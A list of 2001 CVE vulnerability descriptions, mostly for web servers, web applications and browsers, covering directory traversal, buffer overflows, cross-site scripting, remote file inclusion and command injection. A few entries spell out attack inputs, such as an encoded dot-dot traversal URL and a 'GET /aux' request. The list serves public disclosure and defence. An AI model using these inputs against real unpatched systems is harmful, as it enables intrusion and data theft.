[CVE-2001-1250] vWebServer 1.2.0 allows remote attackers to cause a denial of service (hang) via a small number of long URL requests, possibly due to a buffer overflow.
[CVE-2001-1249] vWebServer 1.2.0 allows remote attackers to cause a denial of service via a URL that contains MS-DOS device names.
[CVE-2001-1248] vWebServer 1.2.0 allows remote attackers to view arbitrary ASP scripts via a request for an ASP script that ends with a URL-encoded space character (%20).
[CVE-2001-1247] PHP 4.0.4pl1 and 4.0.5 in safe mode allows remote attackers to read and write files owned by the web server UID by uploading a PHP script that uses the error_log function to access the files.
[CVE-2001-1237] Phormation PHP script 0.9.1 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the phormationdir variable.
[CVE-2001-1236] myphpPagetool PHP script 0.4.3-1 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable.
[CVE-2001-1235] pSlash PHP script 0.7 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable.
[CVE-2001-1234] Bharat Mediratta Gallery PHP script before 1.2.1 allows remote attackers to execute arbitrary code by including files from remote web sites via an HTTP request that modifies the includedir variable.
[CVE-2001-1233] Netware Enterprise Web Server 5.1 running GroupWise WebAccess 5.5 with Novell Directory Services (NDS) enabled allows remote attackers to enumerate user names, group names and other system information by accessing ndsobj.nlm.
[CVE-2001-1232] GroupWise WebAccess 5.5 with directory indexing enabled allows a remote attacker to view arbitrary directory contents via an HTTP request with a lowercase "get".
[CVE-2001-1223] The web administration server for ELSA Lancom 1100 Office does not require authentication, which allows arbitrary remote attackers to gain administrative privileges by connecting to the server.
[CVE-2001-1219] Microsoft Internet Explorer 6.0 and earlier allows malicious website operators to cause a denial of service (client crash) via JavaScript that continually refreshes the window via self.location.
[CVE-2001-1210] Cisco ubr900 series routers that conform to the Data-over-Cable Service Interface Specifications (DOCSIS) standard must ship without SNMP access restrictions, which can allow remote attackers to read and write information to the MIB using arbitrary community strings.
[CVE-2001-1196] Directory traversal vulnerability in edit_action.cgi of Webmin Directory 0.91 allows attackers to gain privileges via a '..' (dot dot) in the argument.
[CVE-2001-1192] Citrix Independent Computing Architecture (ICA) Client for Windows 6.1 allows remote malicious web sites to execute arbitrary code via a .ICA file, which is downloaded and automatically executed by the client.
[CVE-2001-1191] WebSeal in IBM Tivoli SecureWay Policy Director 3.8 allows remote attackers to cause a denial of service (crash) via a URL that ends in %2e.
[CVE-2001-1189] IBM Websphere Application Server 3.5.3 and earlier stores a password in cleartext in the sas.server.props file, which allows local users to obtain the passwords via a JSP script.
[CVE-2001-1161] Cross-site scripting (CSS) vulnerability in Lotus Domino 5.0.6 allows remote attackers to execute script on other web clients via a URL that ends in Javascript, which generates an error message that does not quote the resulting script.
[CVE-2001-1157] Baltimore Technologies WEBsweeper 4.0 and 4.02 does not properly filter Javascript from HTML pages, which could allow remote attackers to bypass the filtering via (1) an extra leading < and one or more characters before the SCRIPT tag, or (2) tags using Unicode.
[CVE-2001-1152] Baltimore Technologies WEBsweeper 4.02, when used to manage URL blacklists, allows remote attackers to bypass blacklist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters.
[CVE-2001-1150] Vulnerability in cgiWebupdate.exe in Trend Micro OfficeScan Corporate Edition (aka Virus Buster) 3.5.2 through 3.5.4 allows remote attackers to read arbitrary files.
[CVE-2001-1135] ZyXEL Prestige 642R and 642R-I routers do not filter the routers' Telnet and FTP ports on the external WAN interface from inside access, allowing someone on an internal computer to reconfigure the router, if the password is known.
[CVE-2001-1115] generate.cgi in SIX-webboard 2.01 and before allows remote attackers to read arbitrary files via a dot dot (..) in the content parameter.
[CVE-2001-1103] FTP Voyager ActiveX control before 8.0, when it is marked as safe for scripting (the default) or if allowed by the IObjectSafety interface, allows remote attackers to execute arbitrary commands.
[CVE-2001-1084] Cross-site scripting vulnerability in Allaire JRun 3.0 and 2.3.3 allows a malicious webmaster to embed Javascript in a request for a .JSP, .shtml, .jsp10, .jrun, or .thtml file that does not exist, which causes the Javascript to be inserted into an error message.
[CVE-2001-1074] Webmin 0.84 and earlier does not properly clear the HTTP_AUTHORIZATION environment variable when the web server is restarted, which makes authentication information available to all CGI programs and allows local users to gain privileges.
[CVE-2001-1073] Webridge PX Application Suite allows remote attackers to obtain sensitive information via a malformed request that generates a server error message, which includes full pathname or internal IP address information in the variables (1) APPL_PHYSICAL_PATH, (2) PATH_TRANSLATED, and (3) LOCAL_ADDR.
[CVE-2001-1065] Web-based configuration utility in Cisco 600 series routers running CBOS 2.0.1 through 2.4.2ap binds itself to port 80 even when web-based configuration services are disabled, which could leave the router open to attack.
[CVE-2001-1054] PHPAdsNew PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1052] Empris PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1051] Dark Hart Portal (darkportal) PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1050] CCCSoftware CCC PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1049] Phorecast PHP script before 0.40 allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1048] AWOL PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable.
[CVE-2001-1045] Directory traversal vulnerability in basilix.php3 in Basilix Webmail 1.0.3beta and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the request_id[DUMMY] parameter.
[CVE-2001-1044] Basilix Webmail 0.9.7beta, and possibly other versions, stores *.class and *.inc files under the document root and does not restrict access, which could allow remote attackers to obtain sensitive information such as MySQL passwords and usernames from the mysql.class file.
[CVE-2001-1023] Xcache 2.1 allows remote attackers to determine the absolute path of web server documents by requesting a URL that is not cached by Xcache, which returns the full pathname in the Content-PageName header.
[CVE-2001-1018] Lotus Domino web server 5.08 allows remote attackers to determine the internal IP address of the server when NAT is enabled via a GET request that contains a long sequence of / (slash) characters.
[CVE-2001-1014] eshop.pl in WebDiscount(e)shop allows remote attackers to execute arbitrary commands via shell metacharacters in the seite parameter.
[CVE-2001-1003] Respondus 1.1.2 for WebCT uses weak encryption to remember usernames and passwords, which allows local users who can read the WEBCT.SVR file to decrypt the passwords and gain additional privileges.
[CVE-2001-0997] Textor Webmasters Ltd listrec.pl CGI program allows remote attackers to execute arbitrary commands via shell metacharacters in the TEMPLATE parameter.
[CVE-2001-0987] Cross-site scripting vulnerability in CGIWrap before 3.7 allows remote attackers to execute arbitrary Javascript on other web clients by causing the Javascript to be inserted into error messages that are generated by CGIWrap.
[CVE-2001-0986] SQLQHit.asp sample file in Microsoft Index Server 2.0 allows remote attackers to obtain sensitive information such as the physical path, file attributes, or portions of source code by directly calling sqlqhit.asp with a CiScope parameter set to (1) webinfo, (2) extended_fileinfo, (3) extended_webinfo, or (4) fileinfo.
[CVE-2001-0982] Directory traversal vulnerability in IBM Tivoli WebSEAL Policy Director 3.01 through 3.7.1 allows remote attackers to read arbitrary files or directories via encoded .. (dot dot) sequences containing "%2e" strings.
[CVE-2001-0980] docview before 1.0-15 allows remote attackers to execute arbitrary commands via shell metacharacters that are processed when converting a man page to a web page.
[CVE-2001-0971] Directory traversal vulnerability in ACI 4d webserver allows remote attackers to read arbitrary files via a .. (dot dot) or drive letter (e.g., C:) in an HTTP request.
[CVE-2001-0969] ipfw in FreeBSD does not properly handle the use of "me" in its rules when point to point interfaces are used, which causes ipfw to allow connections from arbitrary remote hosts.
[CVE-2001-0962] IBM WebSphere Application Server 3.02 through 3.53 uses predictable session IDs for cookies, which allows remote attackers to gain privileges of WebSphere users via brute force guessing.
[CVE-2001-0955] Buffer overflow in fbglyph.c in XFree86 before 4.2.0, related to glyph clipping for large origins, allows attackers to cause a denial of service and possibly gain privileges via a large number of characters, possibly through the web page search form of KDE Konqueror or from an xterm command with a long title.
[CVE-2001-0953] Kebi WebMail allows remote attackers to access the administrator menu and gain privileges via the /a/ hidden directory, which is installed under the web document root.
[CVE-2001-0926] SSIFilter in Allaire JRun 3.1, 3.0 and 2.3.3 allows remote attackers to obtain source code for Java server pages (.jsp) and other files in the web root via an HTTP request for a non-existent SSI page, in which the request's body has an #include statement.
[CVE-2001-0924] Directory traversal vulnerability in ifx CGI program in Informix Web DataBlade allows remote attackers to read arbitrary files via a .. (dot dot) in the LO parameter.
[CVE-2001-0910] Legato Networker before 6.1 allows remote attackers to bypass access restrictions and gain privileges on the Networker interface by spoofing the admin server name and IP address and connecting to Networker from an IP address whose hostname can not be determined by a DNS reverse lookup.
[CVE-2001-0904] Internet Explorer 5.5 and 6 with the Q312461 (MS01-055) patch modifies the HTTP_USER_AGENT (UserAgent) information that indicates that the patch has been installed, which could allow remote malicious web sites to more easily identify and exploit vulnerable clients.
[CVE-2001-0902] Microsoft IIS 5.0 allows remote attackers to spoof web log entries via an HTTP request that includes hex-encoded newline or form-feed characters.
[CVE-2001-0895] Multiple Cisco networking products allow remote attackers to cause a denial of service on the local network via a series of ARP packets sent to the router's interface that contains a different MAC address for the router, which eventually causes the router to overwrite the MAC address in its ARP table.
[CVE-2001-0892] Acme Thttpd Secure Webserver before 2.22, with the chroot option enabled, allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /.
[CVE-2001-0884] Cross-site scripting vulnerability in Mailman email archiver before 2.08 allows attackers to obtain sensitive information or authentication credentials via a malicious link that is accessed by other web users.
[CVE-2001-0874] Internet Explorer 5.5 and 6.0 allow remote attackers to read certain files via HTML that passes information from a frame in the client's domain to a frame in the web site's domain, a variant of the "Frame Domain Verification" vulnerability.
[CVE-2001-0866] Cisco 12000 with IOS 12.0 and line cards based on Engine 2 does not properly handle an outbound ACL when an input ACL is not configured on all the interfaces of a multi port line card, which could allow remote attackers to bypass the intended access controls.
[CVE-2001-0857] Cross-site scripting vulnerability in status.php3 in Imp Webmail 2.2.6 and earlier allows remote attackers to gain access to the e-mail of other users by hijacking session cookies via the message parameter.
[CVE-2001-0847] Lotus Domino Web Server 5.x allows remote attackers to gain sensitive information by accessing the default navigator $defaultNav via (1) URL encoding the request, or (2) directly requesting the ReplicaID.
[CVE-2001-0846] Lotus Domino 5.x allows remote attackers to read files or execute arbitrary code by requesting the ReplicaID of the Web Administrator template file (webadmin.ntf).
[CVE-2001-0836] Buffer overflow in Oracle9iAS Web Cache 2.0.0.1 allows remote attackers to execute arbitrary code via a long HTTP GET request.
[CVE-2001-0835] Cross-site scripting vulnerability in Webalizer 2.01-06, and possibly other versions, allows remote attackers to inject arbitrary HTML tags by specifying them in (1) search keywords embedded in HTTP referrer information, or (2) host names that are retrieved via a reverse DNS lookup.
[CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
[CVE-2001-0828] A cross-site scripting vulnerability in Caucho Technology Resin before 1.2.4 allows a malicious webmaster to embed Javascript in a hyperlink that ends in a .jsp extension, which causes an error message that does not properly quote the Javascript.
[CVE-2001-0824] Cross-site scripting vulnerability in IBM WebSphere 3.02 and 3.5 FP2 allows remote attackers to execute Javascript by inserting the Javascript into (1) a request for a .JSP file, or (2) a request to the webapp/examples/ directory, which inserts the Javascript into an error page.
[CVE-2001-0808] gnatsweb.pl in GNATS GnatsWeb 2.7 through 3.95 allows remote attackers to execute arbitrary commands via certain characters in the help_file parameter.
[CVE-2001-0807] Internet Explorer 5.0, and possibly other versions, may allow remote attackers (malicious web pages) to read known text files from a client's hard drive via a SCRIPT tag with a SRC value that points to the text file.
[CVE-2001-0805] Directory traversal vulnerability in ttawebtop.cgi in Tarantella Enterprise 3.00 and 3.01 allows remote attackers to read arbitrary files via a .. (dot dot) in the pg parameter.
[CVE-2001-0761] Buffer overflow in HttpSave.dll in Trend Micro InterScan WebManager 1.2 allows remote attackers to execute arbitrary code via a long value to a certain parameter.
[CVE-2001-0760] Citrix Nfuse 1.51 allows remote attackers to obtain the absolute path of the web root via a malformed request to launch.asp that does not provide the session field.
[CVE-2001-0749] Beck IPC GmbH IPC@CHIP Embedded-Webserver allows remote attackers to read arbitrary files via a webserver root directory set to system root.
[CVE-2001-0747] Buffer overflow in iPlanet Web Server (iWS) Enterprise Edition 4.1, service packs 3 through 7, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long method name in an HTTP request.
[CVE-2001-0746] Buffer overflow in Web Publisher in iPlanet Web Server Enterprise Edition 4.1 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a request for a long URI with (1) GETPROPERTIES, (2) GETATTRIBUTENAMES, or other methods.
[CVE-2001-0743] Paging function in O'Reilly WebBoard Pager 4.10 allows remote attackers to cause a denial of service via a message with an escaped ' character followed by JavaScript commands.
[CVE-2001-0739] Guardian Digital WebTool in EnGarde Secure Linux 1.0.1 allows restarted services to inherit some environmental variables, which could allow local users to gain root privileges.
[CVE-2001-0728] Buffer overflow in Compaq Management Agents before 5.2, included in Compaq Web-enabled Management Software, allows local users to gain privileges.
[CVE-2001-0726] Outlook Web Access (OWA) in Microsoft Exchange 5.5 Server, when used with Internet Explorer, does not properly detect certain inline script, which can allow remote attackers to perform arbitrary actions on a user's Exchange mailbox via an HTML e-mail message.
[CVE-2001-0711] Cisco IOS 11.x and 12.0 with ATM support allows attackers to cause a denial of service via the undocumented Interim Local Management Interface (ILMI) SNMP community string.
[CVE-2001-0705] Directory traversal vulnerability in tradecli.dll in Arcadia Internet Store 1.0 allows a remote attacker to read arbitrary files on the web server via a URL with "dot dot" sequences in the template argument.
[CVE-2001-0693] WebTrends HTTP Server 3.1c and 3.5 allows a remote attacker to view script source code via a filename followed by an encoded space (%20).
[CVE-2001-0687] Broker FTP server 5.9.5 for Windows NT and 9x allows a remote attacker to retrieve privileged web server system information by (1) issuing a CD command (CD C:) followed by the LS command, (2) specifying arbitrary paths in the UNC format (\\computername\sharename).
[CVE-2001-0680] Directory traversal vulnerability in ftpd in QPC QVT/Net 4.0 and AVT/Term 5.0 allows a remote attacker to traverse directories on the web server via a "dot dot" attack in a LIST (ls) command.
[CVE-2001-0678] A buffer overflow in reggo.dll file used by Trend Micro InterScan VirusWall prior to 3.51 build 1349 for Windows NT 3.5 and InterScan WebManager 1.2 allows a local attacker to execute arbitrary code.
[CVE-2001-0674] Directory traversal vulnerability in RobTex Viking Web server before 1.07-381 allows remote attackers to read arbitrary files via a hexadecimal encoded dot-dot attack (e.g. http://www.server.com/%2e%2e/%2e%2e) in an HTTP URL request.
[CVE-2001-0666] Outlook Web Access (OWA) in Microsoft Exchange 2000 allows an authenticated user to cause a denial of service (CPU consumption) via a malformed OWA request for a deeply nested folder within the user's mailbox.
[CVE-2001-0665] Internet Explorer 6 and earlier allows remote attackers to cause certain HTTP requests to be automatically executed and appear to come from the user, which could allow attackers to gain privileges or execute operations within web-based services, aka the "HTTP Request Encoding vulnerability."
[CVE-2001-0660] Outlook Web Access (OWA) in Microsoft Exchange 5.5, SP4 and earlier, allows remote attackers to identify valid user email addresses by directly accessing a back-end function that processes the global address list (GAL).
[CVE-2001-0649] Personal Web Sharing 1.5.5 allows a remote attacker to cause a denial of service via a long HTTP request.
[CVE-2001-0647] Orange Web Server 2.1, based on GoAhead, allows a remote attacker to perform a denial of service via an HTTP GET request that does not include the HTTP version.
[CVE-2001-0633] Directory traversal vulnerability in Sun Chili!Soft ASP on multiple Unixes allows a remote attacker to read arbitrary files above the web root via a '..' (dot dot) attack in the sample script 'codebrws.asp'.
[CVE-2001-0626] O'Reilly Website Professional 2.5.4 and earlier allows remote attackers to determine the physical path to the root directory via a URL request containing a ":" character.
[CVE-2001-0621] The FTP server on Cisco Content Service 11000 series switches (CSS) before WebNS 4.01B23s and WebNS 4.10B13s allows an attacker who is an FTP user to read and write arbitrary files via GET or PUT commands.
[CVE-2001-0608] HP architected interface facility (AIF) as included with MPE/iX 5.5 through 6.5 running on a HP3000 allows an attacker to gain additional privileges and gain access to databases via the AIF - AIFCHANGELOGON program.
[CVE-2001-0606] Vulnerability in iPlanet Web Server 4.X in HP-UX 11.04 (VVOS) with VirtualVault A.04.00 allows a remote attacker to create a denial of service via the HTTPS service.
[CVE-2001-0583] Alt-N Technologies MDaemon 3.5.4 allows a remote attacker to create a denial of service via the URL request of a MS-DOS device (such as GET /aux) to (1) the Worldclient service at port 3000, or (2) the Webconfig service at port 3001.
[CVE-2001-0571] Directory traversal vulnerability in the web server for (1) Elron Internet Manager (IM) Message Inspector and (2) Anti-Virus before 3.0.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the requested URL.
[CVE-2001-0568] Digital Creations Zope 2.3.1 b1 and earlier allows a local attacker (Zope user) with through-the-web scripting capabilities to alter ZClasses class attributes.
[CVE-2001-0564] APC Web/SNMP Management Card prior to Firmware 310 only supports one telnet connection, which allows a remote attacker to create a denial of service via repeated failed logon attempts which temporarily locks the card.
[CVE-2001-0558] T. Hauck Jana Webserver 2.01 beta 1 and earlier allows a remote attacker to create a denial of service via a URL request which includes a MS-DOS device name (i.e. GET /aux HTTP/1.0).
[CVE-2001-0557] T. Hauck Jana Webserver 1.46 and earlier allows a remote attacker to view arbitrary files via a '..' (dot dot) attack which is URL encoded (%2e%2e).
[CVE-2001-0538] Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier allows remote attackers to execute arbitrary commands via a malicious HTML e-mail message or web page.
[CVE-2001-0535] Example applications (Exampleapps) in ColdFusion Server 4.x do not properly restrict access from outside the local host's domain, which allows remote attackers to upload, read, or execute files by spoofing the "HTTP Host" (CGI.Host) variable in (1) the "Web Publish" example script, and (2) the "Email" example script.
[CVE-2001-0508] Vulnerability in IIS 5.0 allows remote attackers to cause a denial of service (restart) via a long, invalid WebDAV request.
[CVE-2001-0495] Directory traversal in DataWizard WebXQ server 1.204 allows remote attackers to view files outside of the web root via a .. (dot dot) attack.
[CVE-2001-0492] Netcruiser Web server version 0.1.2.8 and earlier allows remote attackers to determine the physical path of the server via a URL containing (1) con, (2) com2, or (3) com3.
[CVE-2001-0483] Configuration error in Axent Raptor Firewall 6.5 allows remote attackers to use the firewall as a proxy to access internal web resources when the http.noproxy Rule is not set.
[CVE-2001-0477] Vulnerability in WebCalendar 0.9.26 allows remote command execution.
[CVE-2001-0467] Directory traversal vulnerability in RobTex Viking Web server before 1.07-381 allows remote attackers to read arbitrary files via a \... (modified dot dot) in an HTTP URL request.
[CVE-2001-0464] Buffer overflow in websync.exe in Cyberscheduler allows remote attackers to execute arbitrary commands via a long tzs (timezone) parameter.
[CVE-2001-0462] Directory traversal vulnerability in Perl web server 0.3 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
[CVE-2001-0460] Websweeper 4.0 does not limit the length of certain HTTP headers, which allows remote attackers to cause a denial of service (memory exhaustion) via an extremely large HTTP Referrer: header.
[CVE-2001-0453] Directory traversal vulnerability in BRS WebWeaver HTTP server allows remote attackers to read arbitrary files via a .. (dot dot) attack in the (1) syshelp, (2) sysimages, or (3) scripts directories.
[CVE-2001-0452] BRS WebWeaver FTP server before 0.64 Beta allows remote attackers to obtain the real pathname of the server via a "CD *" command followed by an ls command.
[CVE-2001-0448] Web configuration server in 602Pro LAN SUITE allows remote attackers to cause a denial of service via an HTTP GET HTTP request to the aux directory, and possibly other directories with legacy DOS device names.
[CVE-2001-0447] Web configuration server in 602Pro LAN SUITE allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP request containing "%2e" (dot dot) characters.
[CVE-2001-0446] IBM WCS (WebSphere Commerce Suite) 4.0.1 with Application Server 3.0.2 allows remote attackers to read source code for .jsp files by appending a / to the requested URL.
[CVE-2001-0434] The LogDataListToFile ActiveX function used in (1) Knowledge Center and (2) Back web components of Compaq Presario computers allows remote attackers to modify arbitrary files and cause a denial of service.
[CVE-2001-0433] Buffer overflow in Savant 3.0 web server allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long Host HTTP header.
[CVE-2001-0431] Vulnerability in iPlanet Web Server Enterprise Edition 4.x.
[CVE-2001-0419] Buffer overflow in shared library ndwfn4.so for iPlanet Web Server (iWS) 4.1, when used as a web listener for Oracle application server 4.0.8.2, allows remote attackers to execute arbitrary commands via a long HTTP request that is passed to the application server, such as /jsp/.
[CVE-2001-0404] Directory traversal vulnerability in JavaServer Web Dev Kit (JSWDK) 1.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP request to the WEB-INF directory.
[CVE-2001-0399] Caucho Resin 1.3b1 and earlier allows remote attackers to read source code for Javabean files by inserting a .jsp before the WEB-INF specifier in an HTTP request.
[CVE-2001-0396] The pre-login mode in the System Administrator interface of Lightwave ConsoleServer 3200 allows remote attackers to obtain sensitive information such as system status, configuration, and users.
[CVE-2001-0394] Remote manager service in Website Pro 3.0.37 allows remote attackers to cause a denial of service via a series of malformed HTTP requests to the /dyn directory.
[CVE-2001-0390] IBM Websphere/NetCommerce3 3.1.2 allows remote attackers to cause a denial of service by directly calling the macro.d2w macro with a long string of %0a characters.
[CVE-2001-0389] IBM Websphere/NetCommerce3 3.1.2 allows remote attackers to determine the real path of the server by directly calling the macro.d2w macro with a NOEXISTINGHTMLBLOCK argument.
[CVE-2001-0385] GoAhead webserver 2.1 allows remote attackers to cause a denial of service via an HTTP request to the /aux directory.
[CVE-2001-0374] The HTTP server in Compaq web-enabled management software for (1) Foundation Agents, (2) Survey, (3) Power Manager, (4) Availability Agents, (5) Intelligent Cluster Administrator, and (6) Insight Manager can be used as a generic proxy server, which allows remote attackers to bypass access restrictions via the management port, 2301.
[CVE-2001-0367] Mirabilis ICQ WebFront Plug-in ICQ2000b Build 3278 allows a remote attacker to create a denial of service via HTTP URL requests containing a large number of % characters.
[CVE-2001-0366] saposcol in SAP R/3 Web Application Server Demo before 1.5 trusts the PATH environmental variable to find and execute the expand program, which allows local users to obtain root access by modifying the PATH to point to a Trojan horse expand program.
[CVE-2001-0340] An interaction between the Outlook Web Access (OWA) service in Microsoft Exchange 2000 Server and Internet Explorer allows attackers to execute malicious script code against a user's mailbox via a message attachment that contains HTML code, which is executed automatically.
[CVE-2001-0339] Internet Explorer 5.5 and earlier allows remote attackers to display a URL in the address bar that is different than the URL that is actually being displayed, which could be used in web site spoofing attacks, aka the "Web page spoofing vulnerability."
[CVE-2001-0338] Internet Explorer 5.5 and earlier does not properly validate digital certificates when Certificate Revocation List (CRL) checking is enabled, which could allow remote attackers to spoof trusted web sites, aka the "Server certificate validation vulnerability."
[CVE-2001-0332] Internet Explorer 5.5 and earlier does not properly verify the domain of a frame within a browser window, which allows remote web site operators to read certain files on the client by sending information from a local frame to a frame in a different domain using MSScriptControl.ScriptControl and GetObject, aka a variant of the "Frame Domain Verification" vulnerability.
[CVE-2001-0330] Bugzilla 2.10 allows remote attackers to access sensitive information, including the database username and password, via an HTTP request for the globals.pl file, which is normally returned by the web server without being executed.
[CVE-2001-0327] iPlanet Web Server Enterprise Edition 4.1 and earlier allows remote attackers to retrieve sensitive data from memory allocation pools, or cause a denial of service, via a URL-encoded Host: header in the HTTP request, which reveals memory in the Location: header that is returned by the server.
[CVE-2001-0312] IBM WebSphere plugin for Netscape Enterprise server allows remote attackers to read source code for JSP files via an HTTP request that contains a host header that references a host that is not in WebSphere's host aliases list, which will bypass WebSphere processing.
[CVE-2001-0306] Directory traversal vulnerability in ITAfrica WEBactive HTTP Server 1.00 allows remote attackers to read arbitrary files via a .. (dot dot) in a URL.
[CVE-2001-0303] tstisapi.dll in Pi3Web 1.0.1 web server allows remote attackers to determine the physical path of the server via a URL that requests a non-existent file.
[CVE-2001-0302] Buffer overflow in tstisapi.dll in Pi3Web 1.0.1 web server allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long URL.
[CVE-2001-0299] Buffer overflow in Voyager web administration server for Nokia IP440 allows local users to cause a denial of service, and possibly execute arbitrary commands, via a long URL.
[CVE-2001-0298] Buffer overflow in WebReflex 1.55 HTTPd allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP GET request.
[CVE-2001-0276] ext.dll in BadBlue 1.02.07 Personal Edition web server allows remote attackers to determine the physical path of the server by directly calling ext.dll without any arguments, which produces an error message that contains the path.
[CVE-2001-0275] Moby Netsuite Web Server 1.02 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP request.
[CVE-2001-0273] pgp4pine Pine/PGP interface version 1.75-6 does not properly check to see if a public key has expired when obtaining the keys via Gnu Privacy Guard (GnuPG), which causes the message to be sent in cleartext.
[CVE-2001-0272] Directory traversal vulnerability in sendtemp.pl in W3.org Anaya Web development server allows remote attackers to read arbitrary files via a .. (dot dot) attack in the templ parameter.
[CVE-2001-0263] Gene6 G6 FTP Server 2.0 (aka BPFTP Server 2.10) allows attackers to read file attributes outside of the web root via the (1) SIZE and (2) MDTM commands when the "show relative paths" option is not enabled.
[CVE-2001-0262] Buffer overflow in Netscape SmartDownload 1.3 allows remote attackers (malicious web pages) to execute arbitrary commands via a long URL.
[CVE-2001-0257] Buffer overflow in Easycom/Safecom Print Server Web service, version 404.590 and earlier, allows remote attackers to execute arbitrary commands via (1) a long URL or (2) a long HTTP header field such as "Host:".
[CVE-2001-0253] Directory traversal vulnerability in hsx.cgi program in iWeb Hyperseek 2000 allows remote attackers to read arbitrary files and directories via a .. (dot dot) attack in the show parameter.
[CVE-2001-0251] The Web Publishing feature in Netscape Enterprise Server 3.x allows remote attackers to cause a denial of service via the REVLOG command.
[CVE-2001-0250] The Web Publishing feature in Netscape Enterprise Server 4.x and earlier allows remote attackers to list arbitrary directories under the web server root via the INDEX command.
[CVE-2001-0246] Internet Explorer 5.5 and earlier does not properly verify the domain of a frame within a browser window, which allows remote web site operators to read certain files on the client by sending information from a local frame to a frame in a different domain, aka a variant of the "Frame Domain Verification" vulnerability.
[CVE-2001-0239] Microsoft Internet Security and Acceleration (ISA) Server 2000 Web Proxy allows remote attackers to cause a denial of service via a long web request with a specific type.
[CVE-2001-0238] Microsoft Data Access Component Internet Publishing Provider 8.103.2519.0 and earlier allows remote attackers to bypass Security Zone restrictions via WebDAV requests.
[CVE-2001-0228] Directory traversal vulnerability in GoAhead web server 2.1 and earlier allows remote attackers to read arbitrary files via a .. attack in an HTTP GET request.
[CVE-2001-0227] Buffer overflow in BiblioWeb web server 2.0 allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long HTTP GET request.
[CVE-2001-0226] Directory traversal vulnerability in BiblioWeb web server 2.0 allows remote attackers to read arbitrary files via a .. (dot dot) or ... attack in an HTTP GET request.
[CVE-2001-0222] webmin 0.84 and earlier allows local users to overwrite and create arbitrary files via a symlink attack.
[CVE-2001-0211] Directory traversal vulnerability in WebSPIRS 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) attack on the sp.nextform parameter.
[CVE-2001-0202] Picserver web server allows remote attackers to read arbitrary files via a .. (dot dot) attack in an HTTP GET request.
[CVE-2001-0200] HSWeb 2.0 HTTP server allows remote attackers to obtain the physical path of the server via a request to the /cgi/ directory, which will list the path if directory browsing is enabled.
[CVE-2001-0189] Directory traversal vulnerability in LocalWEB2000 HTTP server allows remote attackers to read arbitrary commands via a .. (dot dot) attack in an HTTP GET request.
[CVE-2001-0186] Directory traversal vulnerability in Free Java Web Server 1.0 allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2001-0182] FireWall-1 4.1 with a limited-IP license allows remote attackers to cause a denial of service by sending a large number of spoofed IP packets with various source addresses to the inside interface, which floods the console with warning messages and consumes CPU resources.
[CVE-2001-0179] Allaire JRun 3.0 allows remote attackers to list contents of the WEB-INF directory, and the web.xml file in the WEB-INF directory, via a malformed URL that contains a "."
[CVE-2001-0177] WebMaster ConferenceRoom 1.8.1 allows remote attackers to cause a denial of service via a buddy relationship between the IRC server and a server clone.
[CVE-2001-0151] IIS 5.0 allows remote attackers to cause a denial of service via a series of malformed WebDAV requests.
[CVE-2001-0150] Internet Explorer 5.5 and earlier executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands if the IE client is using the Telnet client provided in Services for Unix (SFU) 2.0, which creates session transcripts.
[CVE-2001-0134] Buffer overflow in cpqlogin.htm in web-enabled agents for various Compaq management software products such as Insight Manager and Management Agents allows remote attackers to execute arbitrary commands via a long user name.
[CVE-2001-0122] Kernel leak in AfpaCache module of the Fast Response Cache Accelerator (FRCA) component of IBM HTTP Server 1.3.x and Websphere 3.52 allows remote attackers to cause a denial of service via a series of malformed HTTP requests that generate a "bad request" error.
[CVE-2001-0098] Buffer overflow in Bea WebLogic Server before 5.1.0 allows remote attackers to execute arbitrary commands via a long URL that begins with a ".." string.
[CVE-2001-0096] FrontPage Server Extensions (FPSE) in IIS 4.0 and 5.0 allows remote attackers to cause a denial of service via a malformed form, aka the "Malformed Web Form Submission" vulnerability.
[CVE-2001-0088] common.inc.php in phpWebLog 0.4.2 does not properly initialize the $CONF array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the SiteKey and gain administrative privileges to phpWebLog.
[CVE-2001-0072] gpg (aka GnuPG) 1.0.4 and other versions imports both public and private keys from public key servers without notifying the user about the private keys, which could allow an attacker to break the web of trust.
[CVE-2001-0064] Webconfig, IMAP, and other services in MDaemon 3.5.0 and earlier allows remote attackers to cause a denial of service via a long URL terminated by a "\r\n" string.
[CVE-2001-0021] MailMan Webmail 3.0.25 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the alternate_template parameter.
[CVE-2001-0009] Directory traversal vulnerability in Lotus Domino 5.0.5 web server allows remote attackers to read arbitrary files via a .. attack.
